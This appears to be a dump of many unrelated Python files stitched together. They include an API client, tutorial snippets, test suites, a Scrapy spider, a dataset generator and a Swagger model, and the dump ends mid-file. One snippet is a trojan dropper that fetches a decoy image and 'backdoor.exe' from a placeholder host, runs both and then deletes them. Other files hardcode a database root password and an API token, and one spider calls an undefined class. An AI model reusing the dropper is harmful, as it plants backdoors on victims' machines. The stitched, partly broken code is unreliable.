self._keys = keys
self._session = session
self.ssl_verify = ssl_verify
if not session:
params = {
"name": user,
"password": token
}
self._session = requests.Session()
ret = self.do_request('get', '/', params=params)
print(ret)
api_token = {
"name": user,
"sig": ret.get("sig")
}
self._session.auth = (user, token)
self._session.headers.update({
'Content-Type': 'application/json; charset=utf-8',
'Accept': 'application/json',
'Apitoken': json.dumps(api_token)
})
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
return self.__class__(
endpoint=self._endpoint,
keys=self._keys + [key],
session=self._session,
ssl_verify=self.ssl_verify)
def __getitem__(self, key):
"""Look up an option value and perform string substitution."""
return self.__getattr__(key)
def __call__(self, **kwargs):
method = self._keys[-1]
url = "/".join(self._keys[0:-1])
url = url.replace("_", "-")
return self.do_request(method, url, **kwargs)
def do_request(self, method, url, params=None, data=None):
url = self._endpoint + url + self._url_suffix
if data:
print(data)
if params is None:
params = {}
if method == 'get' or method == 'list':
response = self._session.get(url, params=params, verify=self.ssl_verify)
if method == 'post' or method == 'create':
response = self._session.post(url, params=params, json=data, verify=self.ssl_verify)
if method == 'put' or method == 'update':
response = self._session.put(url, json=data, verify=self.ssl_verify)
if method == 'delete':
response = self._session.delete(url, params=params, json=data, verify=self.ssl_verify)
try:
body = json.loads(response.text)
except ValueError:
body = "Get unknow error is [%s]" % response.reason
return body
if __name__ == '__main__':
cli = FalconClient(endpoint="http://n9e.xxoo.com", user='admin', token='11871bd159bd19da9ab624d161c569e3c8')
params = {"idents": ["192.168.0.112"]}
r = cli.node['2'].endpoint_unbind.post(data=params)
print(r)
| 2,938 | 886 |
import matplotlib.pyplot
meses = ['Janeiro','Fevereiro','Marco','Abril','Maio','Junho']
valores = [105235, 107697, 110256, 109236, 108859, 109986]
matplotlib.pyplot.plot(meses, valores)
matplotlib.pyplot.title('Faturamento no primeiro semestre de 2017')
matplotlib.pyplot.xlabel('Meses')
matplotlib.pyplot.ylabel('Faturamento em R$')
matplotlib.pyplot.savefig('grafico.png', dpi=100)
matplotlib.pyplot.show()
| 411 | 189 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import mysql.connector
mydb = mysql.connector.connect(
host = "localhost",
user = "root",
passwd = "schleichkatze",
database = "helmstedt"
)
mycursor = mydb.cursor()
mycursor.execute("SELECT id, gnd FROM helmstedt.temp_prof_kat")
myresult = mycursor.fetchall()
gnds = [x[1] for x in myresult if x[1] != None]
print('|'.join(gnds))
"""
# Eine Liste (geordnet, indexiert und veränderlich)
mylist = ['Lerche', 'Schneider', 'Zimmermann', 'Kästner', 'Raabe', 'Schmidt-Glintzer', 'bURSCHEL']
mylist[len(mylist) - 1] = mylist[len(mylist) - 1].swapcase()
mylist.append('Ritter Rost')
mylist.insert(0, 'Zimmermann')
print(mylist)
"""
"""
# Ein Tupel (ist unveränderlich)
mytuple = ('Montag', 'Dienstag', 'Mittwoch', 'Donnerstag', 'Freitag', 'Samstag', 'Sonntag')
#print(mytuple[3:6])
"""
"""
# Ein Set (unindexiert und ungeordnet, Elemente sind unveränderlich, können aber vermehrt oder reduziert werden)
myset = {'Adenauer', 'Erhard', 'Kiesinger', 'Brandt', 'Schmidt', 'Kohl', 'Schröder', 'Merkel', 'Schulz'}
myset.remove('Schulz')
myset.add('Kramp-Karrenbauer')
for i in myset:
print(i)
"""
"""
# Ein Dictionary
mydict = {'Mann':'vyras', 'Frau':'moteris','Fisch':'žuvis', 'Biber':'bebras', 'Stadt':'miestas', 'König':'karalius'}
for x, y in mydict.items():
print(x + ' heißt auf Litauisch ' + y)
"""
"""
# Eine Datumsoperation
import time
import datetime
time = time.localtime(time.time())
print(time)
"""
"""
# Eine Funktion
def makeName(forename, surname, title=""):
result = forename + " " + surname
if title:
result = title + " " + result
return result
print(makeName("Hartmut", "Beyer", "Magister artium"))
"""
"""
# Eine Klasse
class Person:
def __init__(self, forename, surname):
self.forename = forename
self.surename = surname
person = Person('Ben', 'Gurion')
print(person.forename)
"""
"""
# Eine Klasse
class Language:
def __init__(self, code):
self.codes = {
"eng":"Englisch",
"ger":"Deutsch",
"fre":"Französisch",
"rus":"Russisch"
}
if code not in self.codes:
self.name = code
return
self.name = self.codes[code]
lang = Language("rus")
print(lang.name)
"""
"""
# Eine Datei aus dem Netz auslesen
import urllib.request as ur
url = "http://diglib.hab.de/edoc/ed000228/1623_06.xml"
fileobject = ur.urlopen(url)
string = fileobject.read()
print(string)
"""
"""
# Eine XML-Datei parsen
import xml.etree.ElementTree as et
tree = et.parse('test.xml')
root = tree.getroot()
nbs = root.findall('.//{http://www.tei-c.org/ns/1.0}rs')
name = ""
for ent in nbs:
if ent.get('type') == 'person':
name = str(ent.text).strip()
ref = str(ent.get('ref')).strip()
print(name + ' - ' + ref)
"""
"""
# Laden und Auslesen einer XML-Datei im Netz
import urllib.request as ur
import xml.etree.ElementTree as et
url = "http://diglib.hab.de/edoc/ed000228/1623_08.xml"
fileobject = ur.urlopen(url)
tree = et.parse(fileobject)
root = tree.getroot()
nbs = root.findall('.//{http://www.tei-c.org/ns/1.0}rs')
name = ""
for ent in nbs:
if ent.get('type') == 'person':
name = str(ent.text).strip()
ref = str(ent.get('ref')).strip()
print(name + ' - ' + ref)
"""
| 3,213 | 1,310 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
Unit tests for scrapername.
'''
import difflib
import filecmp
from datetime import datetime
from os.path import join
from tempfile import gettempdir
import pytest
from hdx.hdx_configuration import Configuration
import hdx.utilities.downloader
from hdx.utilities.compare import assert_files_same
from hdx.utilities.loader import load_json
from src.acled import update_lc_acled, update_ssd_acled
from mapexplorer import get_valid_names
from src.cbpf import update_cbpf
from src.fts import update_fts
#from src.rowca import update_rowca
class TestScraperName:
@pytest.fixture(scope='class')
def configuration(self):
Configuration._create(user_agent='test', hdx_read_only=True,
project_config_yaml=join('tests', 'config', 'project_configuration.yml'))
@pytest.fixture(scope='class')
def folder(self, configuration):
return gettempdir()
@pytest.fixture(scope='class')
def downloader(self):
return hdx.utilities.downloader.Download()
@pytest.fixture(scope='class')
def today(self):
return datetime.strptime('2018-01-16', '%Y-%m-%d')
@pytest.fixture(scope='class')
def lc_country_list(self, configuration):
return ['Nigeria']
@pytest.fixture(scope='class')
def ssd_country_list(self, configuration):
return ['South Sudan']
@pytest.fixture(scope='class')
def valid_lc_names(self, downloader):
lc_names_url = Configuration.read()['lc_names_url']
return get_valid_names(downloader, lc_names_url, headers=['ISO', 'Name'])
@pytest.fixture(scope='class')
def replace_lc_values(self, downloader):
lc_mappings_url = Configuration.read()['lc_mappings_url']
return downloader.download_tabular_key_value(lc_mappings_url)
@pytest.fixture(scope='class')
def valid_ssd_adm1_names(self, downloader):
ssd_adm1_names_url = Configuration.read()['ssd_adm1_names_url']
return get_valid_names(downloader, ssd_adm1_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def valid_ssd_adm2_names(self, downloader):
ssd_adm2_names_url = Configuration.read()['ssd_adm2_names_url']
return get_valid_names(downloader, ssd_adm2_names_url, headers=['Name'])
@pytest.fixture(scope='class')
def replace_ssd_values(self, downloader):
ssd_mappings_url = Configuration.read()['ssd_mappings_url']
return downloader.download_tabular_key_value(ssd_mappings_url)
@pytest.fixture(scope='function')
def downloaderfts(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://lala/plan/country/NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_plan_NGA.json'))
response.json = fn
elif url == 'http://lala/fts/flow?groupby=plan&countryISO3=NGA':
def fn():
return load_json(join('tests', 'fixtures', 'FTS_flow_NGA.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloaderrowca(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://haha/country=3,4,8,9&subcat=4&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_population.json'))
response.json = fn
elif url == 'http://haha/country=3,4,8,9&subcat=9,10&inclids=yes&final=1&format=json&lng=en':
def fn():
return load_json(join('tests', 'fixtures', 'ROWCA_movement.json'))
response.json = fn
return response
return Download()
@pytest.fixture(scope='function')
def downloadercbpf(self):
class Response:
@staticmethod
def json():
pass
class Download:
@staticmethod
def download(url):
response = Response()
if url == 'http://mama/ProjectSummary?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_ProjectSummary_SSD.json'))
response.json = fn
elif url == 'http://mama/Location?poolfundAbbrv=SSD19':
def fn():
return load_json(join('tests', 'fixtures', 'CBPF_Location_SSD.json'))
response.json = fn
return response
return Download()
def test_lc_acled(self, folder, today, lc_country_list, valid_lc_names, replace_lc_values):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'Lake_Chad_Basin_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_lc_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDNigeria.csv?', lc_country_list, valid_lc_names, replace_lc_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_ssd_acled(self, folder, today, ssd_country_list, valid_ssd_adm2_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Recent_Conflict_Events.csv'
expected_events = join('tests', 'fixtures', filename)
actual_events = join(folder, filename)
resource_updates['acled_events'] = {'path': actual_events}
filename = 'South_Sudan_Recent_Conflict_Event_Total_Fatalities.csv'
expected_fatalities = join('tests', 'fixtures', filename)
actual_fatalities = join(folder, filename)
resource_updates['acled_fatalities'] = {'path': actual_fatalities}
update_ssd_acled(today, 'https://raw.githubusercontent.com/mcarans/hdxscraper-mapexplorer/master/tests/fixtures/ACLEDSouthSudan.csv?', ssd_country_list, valid_ssd_adm2_names, replace_ssd_values, resource_updates)
assert_files_same(expected_events, actual_events)
assert_files_same(expected_fatalities, actual_fatalities)
def test_fts(self, folder, downloaderfts, lc_country_list):
resource_updates = dict()
filename = 'Lake_Chad_Basin_Appeal_Status.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['fts'] = {'path': actual}
update_fts('http://lala/', downloaderfts, lc_country_list, resource_updates)
assert_files_same(expected, actual)
def test_cbpf(self, folder, today, downloadercbpf, valid_ssd_adm1_names, replace_ssd_values):
resource_updates = dict()
filename = 'South_Sudan_Country_Based_Pool_Funds.csv'
expected = join('tests', 'fixtures', filename)
actual = join(folder, filename)
resource_updates['cbpf'] = {'path': actual}
update_cbpf('http://mama/', downloadercbpf, 'SSD19', today, valid_ssd_adm1_names, replace_ssd_values, resource_updates)
assert_files_same(expected, actual)
# def test_rowca(self, folder, downloaderrowca, valid_lc_names, replace_lc_values):
# resource_updates = dict()
# filename = 'Lake_Chad_Basin_Estimated_Population.csv'
# expected_population = join('tests', 'fixtures', filename)
# actual_population = join(folder, filename)
# resource_updates['rowca_population'] = {'path': actual_population}
# filename = 'Lake_Chad_Basin_Displaced.csv'
# expected_displaced = join('tests', 'fixtures', filename)
# actual_displaced = join(folder, filename)
# resource_updates['rowca_displaced'] = {'path': actual_displaced}
# update_rowca('http://haha/', downloaderrowca, valid_lc_names, replace_lc_values, resource_updates)
# assert filecmp.cmp(expected_population, actual_population, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_population, actual_population)
# assert filecmp.cmp(expected_displaced, actual_displaced, shallow=False) is True, 'Expected: %s and Actual: %s do not match!' % (expected_displaced, actual_displaced)
| 9,035 | 2,851 |
# optimizer
optimizer = dict(type='SGD', lr=0.001, momentum=0.9, weight_decay=0.001)
optimizer_config = dict(grad_clip=None)
# learning policy
lr_config = dict(policy='step', step=[40, 70, 90])
runner = dict(type='EpochBasedRunner', max_epochs=100)
| 255 | 111 |
""" Advent of Code Day 6 - Signals and Noise"""
with open('inputs/day_06.txt', 'r') as f:
rows = [row.strip() for row in f.readlines()]
flipped = zip(*rows)
message = ''
mod_message = ''
for chars in flipped:
most_freq = ''
least_freq = ''
highest = 0
lowest = 100
for char in chars:
if chars.count(char) > highest:
highest = chars.count(char)
most_freq = char
if chars.count(char) < lowest: # Part Two
lowest = chars.count(char)
least_freq = char
message += most_freq
mod_message += least_freq
# Answer One
print("Error Corrected Message:", message)
# Answer Two
print("Modified Message:", mod_message)
| 708 | 237 |
import hashlib
import json
import os
import pathlib
import shlex
import nbformat
from invoke import task
files_to_format = ["chmp/src", "tasks.py", "chmp/setup.py"]
inventories = [
"http://daft-pgm.org",
"https://matplotlib.org",
"http://www.numpy.org",
"https://pandas.pydata.org",
"https://docs.python.org/3",
"https://pytorch.org/docs/stable",
]
directories_to_test = ["chmp", "20170813-KeywordDetection/chmp-app-kwdetect"]
@task
def precommit(c):
format(c)
docs(c)
test(c)
@task
def test(c):
run(c, "pytest", *directories_to_test)
@task
def docs(c):
run(
c,
*["python", "-m", "chmp.tools", "mddocs"],
*(part for inventory in inventories for part in ["--inventory", inventory]),
*["chmp/docs/src", "chmp/docs"],
)
self_path = pathlib.Path(__file__).parent.resolve()
for p in self_path.glob("*/Post.ipynb"):
run(
c,
*["python", "-m", "chmp.tools", "blog"],
*[str(p), str(p.with_suffix(".md"))],
)
@task
def format(c):
run(c, "black", *files_to_format)
@task
def release(c, yes=False):
import packaging.version
with c.cd("chmp"):
run(c, "python", "setup.py", "bdist_wheel")
latest_package = max(
(
package
for package in os.listdir("chmp/dist")
if not package.startswith(".") and package.endswith(".whl")
),
key=packaging.version.parse,
)
if not yes:
answer = input(f"upload {latest_package} [yN] ")
if answer != "y":
print("stop")
return
with c.cd("chmp/dist"):
run(c, "twine", "upload", latest_package)
def run(c, *args, **kwargs):
args = [shlex.quote(arg) for arg in args]
args = " ".join(args)
return c.run(args, **kwargs)
| 1,846 | 682 |
# -*- coding:utf-8 -*-
import requests
import json
import random
import hashlib
KEY = ''
APPID = ''
API = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
class translation():
def __init__(self,src, fromlang, tolang):
self.src = src
self.fromlang = fromlang
self.tolang = tolang
def trans(self):
salt = random.randint(32768,65535)
sign = APPID+self.src+str(salt)+KEY
m1 = hashlib.md5()
m1.update(sign)
sign = m1.hexdigest()
paras = {
'q':self.src,
'from':self.fromlang,
'to':self.tolang,
'appid':APPID,
'salt':salt,
'sign':sign
}
result = requests.get(API,params=paras,timeout=50)
tdata = json.loads(result.text)
res_msg = ''
src = tdata['trans_result'][0]['src']
dst = tdata['trans_result'][0]['dst']
res_msg += '源语言: %s\n翻译结果: %s' % (src.encode('utf8'), dst.encode('utf8'))
return res_msg
| 1,016 | 373 |
import bolinette.defaults.models
import bolinette.defaults.mixins
import bolinette.defaults.services
import bolinette.defaults.middlewares
import bolinette.defaults.controllers
import bolinette.defaults.topics
| 210 | 66 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2021 Salvador E. Tropea
# Copyright (c) 2021 Instituto Nacional de Tecnología Industrial
# License: Apache 2.0
# Project: KiCost
# Adapted from: https://github.com/alexprengere/currencyconverter
"""
CurrencyConverter:
This is reduced version of the 'Currency Converter' by Alex Prengère.
Original project: https://github.com/alexprengere/currencyconverter
This version only supports conversions for the last exchange rates, not
historic ones.
On the other hand this version always tries to get the last rates.
"""
try:
from .default_rates import default_rates, default_date
except ImportError:
# Only useful to boostrap
default_rates = {}
default_date = ''
from .download_rates import download_rates
# Author information.
__author__ = 'Salvador Eduardo Tropea'
__webpage__ = 'https://github.com/set-soft/'
__company__ = 'INTI-CMNB - Argentina'
class CurrencyConverter(object):
def __init__(self):
self.initialized = False
def _do_init(self):
if self.initialized:
return
self.date, self.rates = download_rates()
if not self.date:
self.date = default_date
self.rates = default_rates
self.initialized = True
def convert(self, amount, currency, new_currency='EUR'):
"""Convert amount from a currency to another one.
:param float amount: The amount of `currency` to convert.
:param str currency: The currency to convert from.
:param str new_currency: The currency to convert to.
:return: The value of `amount` in `new_currency`.
:rtype: float
>>> c = CurrencyConverter()
>>> c.convert(100, 'EUR', 'USD')
"""
self._do_init()
for c in currency, new_currency:
if c not in self.rates:
raise ValueError('{0} is not a supported currency'.format(c))
r0 = self.rates[currency]
r1 = self.rates[new_currency]
return float(amount) / r0 * r1
| 2,040 | 618 |
import streamlit as st
import leafmap
def app():
st.title("Add vector datasets")
url = "https://raw.githubusercontent.com/giswqs/data/main/world/world_cities.csv"
in_csv = st.text_input("Enter a URL to a vector file", url)
m = leafmap.Map()
if in_csv:
m.add_xy_data(in_csv, x="longitude", y="latitude", layer_name="World Cities")
m.to_streamlit()
| 385 | 144 |
# -*- coding = utf-8 -*-
# @Time:2021/3/1417:56
# @Author:Linyu
# @Software:PyCharm
from web.pageutils import BooksScore
from web.pageutils import BooksCount
from web.pageutils import pointsDraw
from web.pageutils import scoreRelise
from web.pageutils import messBarInfo
from web.pageutils import tagRader
from web.models import tagThree
from web.wdCloud import infoCloud
from web.priceSpider import spider
from web.models import Dict
from web.models import Modle
from web.priceSpider import spiderDD
#用围城做测试
isbn = "'9787020090006'"
dd = "http://search.dangdang.com/?key=%s&act=input&sort_type=sort_xlowprice_asc#J_tab"%(isbn)
ddPrice = spiderDD(dd)
print(ddPrice)
# sql = 'select title from allbook where isbn = %s'%(isbn)
# print(sql)
# testData = Modle().query(sql)
# print(testData[0][0])
# title = "'活着'"
# sqlNum = 'select id_num from corebook where title = %s'%(title)
# id_num = Modle().query(sqlNum)
# print(id_num[0][0])
# print(scoreRelise())
# print(BooksScore())
# print(BooksCount())
# print(pointsDraw())
# messBar()
# print(messBar())
# tagRader()
# tagThree("小说")
# infoCloud('代码大全(第2版)')
# print(spider('9787108009821'))
# dic = Dict()
# for key in dic.keys():
# print(key)
# print(dic[key])
| 1,225 | 493 |
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from readability import Document
import datetime
from pprint import pprint
class Articles(scrapy.Item):
url = scrapy.Field()
title = scrapy.Field()
author = scrapy.Field()
published = scrapy.Field()
body = scrapy.Field()
agency = scrapy.Field()
class BbcSpider(CrawlSpider):
name = 'bbc'
allowed_domains = ['bbc.com']
start_urls = ['http://bbc.com/news']
rules = (
Rule(LinkExtractor(), callback='parse_item', follow=True),
)
def parse_item(self, res):
title = self.get_title(res)
article = Article()
# Only do further processing if there is a title element in the page
if title != None:
article = Articles()
article['url'] = res.url
article['title']=title
article['body']= self.get_body(res)
article['published']= self.get_published(res)
article['author']= self.get_author(res)
article['agency']= self.get_agency(res)
# self.log(article)
return article
else:
return None
def get_title(self, res):
"""
Get the title of the article
"""
title = res.css('h1.story-body__h1 ::text').extract_first()
return title
def get_body(self, res):
"""
Get the actual text of the article
"""
raw = res.css('div.story-body__inner p ::text')
body = ''.join(raw.extract())
return body
def get_published(self, res):
"""
Get the article timestamp
"""
timestamp = res.css('div.story-body div.date ::attr(data-seconds)').extract_first()
published = datetime.datetime.fromtimestamp(int(timestamp))
return published
def get_author(self, res):
"""
Get the author of the article. BBC is somewhat shy about putting a name on articles
So we just return the string "bbc"
"""
return 'bbc'
def get_agency(self, res):
"""
Get the agency name
"""
return 'bbc'
| 2,252 | 654 |
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
from django_countries.fields import CountryField
class Profile(models.Model):
"""Extend user model with a country field."""
user = models.OneToOneField(User, on_delete=models.CASCADE)
country = CountryField(blank_label='(select country)', blank=True)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
| 698 | 206 |
import os
import sys
import tempfile
import unittest
import subprocess
from unittest.mock import Mock, patch
import mock
from prometheus_client import Histogram
from flower.command import apply_options, warn_about_celery_args_used_in_flower_command, apply_env_options
from tornado.options import options
from tests.unit import AsyncHTTPTestCase
class TestFlowerCommand(AsyncHTTPTestCase):
def test_task_runtime_metric_buckets_read_from_cmd_line(self):
apply_options('flower', argv=['--task_runtime_metric_buckets=1,10,inf'])
self.assertEqual([1.0, 10.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_cmd_line_arg(self):
apply_options('flower', argv=[])
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_read_from_env(self):
os.environ["FLOWER_TASK_RUNTIME_METRIC_BUCKETS"] = "2,5,inf"
apply_env_options()
self.assertEqual([2.0, 5.0, float('inf')], options.task_runtime_metric_buckets)
def test_task_runtime_metric_buckets_no_env_value_provided(self):
apply_env_options()
self.assertEqual(Histogram.DEFAULT_BUCKETS, options.task_runtime_metric_buckets)
def test_port(self):
with self.mock_option('port', 5555):
apply_options('flower', argv=['--port=123'])
self.assertEqual(123, options.port)
def test_address(self):
with self.mock_option('address', '127.0.0.1'):
apply_options('flower', argv=['--address=foo'])
self.assertEqual('foo', options.address)
def test_autodiscovery(self):
"""
Simulate basic Django setup:
- creating celery app
- run app.autodiscover_tasks()
- create flower command
"""
celery_app = self._get_celery_app()
with mock.patch.object(celery_app, '_autodiscover_tasks') as autodiscover:
celery_app.autodiscover_tasks()
self.get_app(capp=celery_app)
self.assertTrue(autodiscover.called)
class TestWarnAboutCeleryArgsUsedInFlowerCommand(AsyncHTTPTestCase):
@patch('flower.command.logger.warning')
def test_does_not_log_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--port=5678', '--address=0.0.0.0')
)
mock_warning.assert_not_called()
@patch('flower.command.logger.warning')
def test_logs_warning(self, mock_warning):
mock_app_param = Mock(name='app_param', opts=('-A', '--app'))
mock_broker_param = Mock(name='broker_param', opts=('-b', '--broker'))
class FakeContext:
parent = Mock(command=Mock(params=[mock_app_param, mock_broker_param]))
ctx = FakeContext()
warn_about_celery_args_used_in_flower_command(
ctx=ctx, flower_args=('--app=proj', '-b', 'redis://localhost:6379/0')
)
mock_warning.assert_called_once_with(
"You have incorrectly specified the following celery arguments after flower command: "
"[\'--app\', \'-b\']. Please specify them after celery command instead following"
" this template: celery [celery args] flower [flower args]."
)
class TestConfOption(AsyncHTTPTestCase):
def test_error_conf(self):
with self.mock_option('conf', None):
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=foo'])
self.assertRaises(IOError, apply_options,
'flower', argv=['--conf=/tmp/flower/foo'])
def test_default_option(self):
apply_options('flower', argv=[])
self.assertEqual('flowerconfig.py', options.conf)
def test_empty_conf(self):
with self.mock_option('conf', None):
apply_options('flower', argv=['--conf=/dev/null'])
self.assertEqual('/dev/null', options.conf)
def test_conf_abs(self):
with tempfile.NamedTemporaryFile() as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % cf.name])
self.assertEqual(cf.name, options.conf)
self.assertTrue(options.debug)
def test_conf_relative(self):
with tempfile.NamedTemporaryFile(dir='.') as cf:
with self.mock_option('conf', cf.name), self.mock_option('debug', False):
cf.write('debug=True\n'.encode('utf-8'))
cf.flush()
apply_options('flower', argv=['--conf=%s' % os.path.basename(cf.name)])
self.assertTrue(options.debug)
@unittest.skipUnless(not sys.platform.startswith("win"), 'skip windows')
def test_all_options_documented(self):
def grep(patter, filename):
return int(subprocess.check_output(
'grep "%s" %s|wc -l' % (patter, filename), shell=True))
defined = grep('^define(', 'flower/options.py') - 4
documented = grep('^~~', 'docs/config.rst')
self.assertEqual(defined, documented,
msg='Missing option documentation. Make sure all options '
'are documented in docs/config.rst')
| 5,684 | 1,805 |
#!/usr/bin/env python
import requests
import subprocess
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as out_file:
out_file.write(get_response.content)
temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
download("http://ip/image.jpg")
subprocess.Popen("image.jpg", shell=True)
download("http://ip/backdoor.exe")
subprocess.call("backdoor.exe", shell=True)
os.remove("image.jpg")
os.remove("backdoor.exe")
| 534 | 187 |
import numpy as np
import cv2
import math
import random
import os
from tempfile import TemporaryFile
from sklearn.model_selection import train_test_split
# Creating classes.
length=[7,15]
width=[1,3]
col=[]
col.append([0,0,255]) #Blue
col.append([255,0,0]) #Red
interval=15
angles=[]
x=0
while x<180:
angles.append(x)
x+=interval
dirn=1
a1=0
os.mkdir("/home/aj/Desktop/DL2")
for l in length:
a2=0 #a1 0->7,1->15
for w in width:
a3=0 #a2 0->1,1->3
for co in col:
a4=0 #a3 0->red,1->blue
for ang in angles:
flag=0
m=0
os.mkdir("/home/aj/Desktop/DL2/"+str(dirn))
while flag<1000:
img=np.zeros((28,28,3),np.uint8)
x=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
y=random.randrange((28-math.ceil(l*math.sin(math.radians(180-ang)))))
endy = y+l*math.sin(math.radians(180-ang))
endy=math.floor(endy)
endx = x+l*math.cos(math.radians(180-ang))
endx=math.floor(endx)
if(0<=endx<=28 and 0<=endy<=28):
cv2.line(img,(x,y),(endx,endy),co,w)
flag=flag+1
cv2.imwrite("/home/aj/Desktop/DL2/"+str(dirn)+"/"+str(a1)+"_"+str(a2)+"_"+str(a4)+"_"+str(a3)+"_"+str(flag)+".png",img)
dirn+=1
a4+=1
a3=a3+1
a2=a2+1
a1=a1+1
outfile = TemporaryFile()
# Creating Frames
train=[]
train_class=[]
test_class=[]
allimg=[]
label=[]
flag=0
# os.mkdir("/home/aj/Desktop/DL2/frames")
for count in range (1,97):
f=[]
# os.mkdir("/home/aj/Desktop/DL2/frames/frame_"+str(count))
f=os.listdir("/home/aj/Desktop/DL2/"+str(count))
for fi in f:
# print(fi)
n=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+fi)
n = n.reshape(2352)
allimg.append(n)
label.append(flag)
flag+=1
for i in range (0,10):
img1=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i],1)
img2=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+1],1)
img3=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+2],1)
img1f=np.concatenate((img1,img2,img3),axis=1)
img4=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+3],1)
img5=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+4],1)
img6=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+5],1)
img2f=np.concatenate((img4,img5,img6),axis=1)
img7=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+6],1)
img8=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+7],1)
img9=cv2.imread("/home/aj/Desktop/DL2/"+str(count)+"/"+f[i+8],1)
img3f=np.concatenate((img7,img8,img9),axis=1)
imgf=np.concatenate((img1f,img2f,img3f),axis=0)
cv2.imwrite("/home/aj/Desktop/DL2/frames/frame_"+str(count)+"/"+"f"+str(i+1)+".png",imgf)
# print(allimg[0])
# print(label[0:97])
X_train, X_test, y_oldtrain, y_oldtest = train_test_split(allimg, label, test_size=0.40, random_state=42)
# print(y_oldtrain[0:10])
y_oldtrain = np.array(y_oldtrain).reshape(-1)
y_train=np.eye(96)[y_oldtrain]
y_oldtest = np.array(y_oldtest).reshape(-1)
y_test=np.eye(96)[y_oldtest]
np.savez_compressed("/home/aj/Desktop/DL2/outfile",X_train=X_train,X_test=X_test,y_train=y_train,y_test=y_test)
# Creating Video
# img_frame=[]
# for i in range (1,97):
# f=[]
# f=os.listdir("/home/aj/Desktop/DL2/frames/frame_"+str(i))
# path="/home/aj/Desktop/DL2/frames/frame_"+str(i)+"/"
# for file in f:
# img = cv2.imread(path+file)
# height,width,layers = img.shape
# size = (width,height)
# img_frame.append(img)
# out = cv2.VideoWriter("/home/aj/Desktop/DL2/assign1.mp4",0x7634706d,5, size)
# for i in range(len(img_frame)):
# out.write(img_frame[i])
# out.release() | 3,524 | 1,836 |
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UserRoleResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'description': 'str',
'supported_restrictions': 'list[str]',
'space_permission_descriptions': 'list[str]',
'system_permission_descriptions': 'list[str]',
'granted_space_permissions': 'list[str]',
'granted_system_permissions': 'list[str]',
'can_be_deleted': 'bool',
'last_modified_on': 'datetime',
'last_modified_by': 'str',
'links': 'dict(str, str)'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'description': 'Description',
'supported_restrictions': 'SupportedRestrictions',
'space_permission_descriptions': 'SpacePermissionDescriptions',
'system_permission_descriptions': 'SystemPermissionDescriptions',
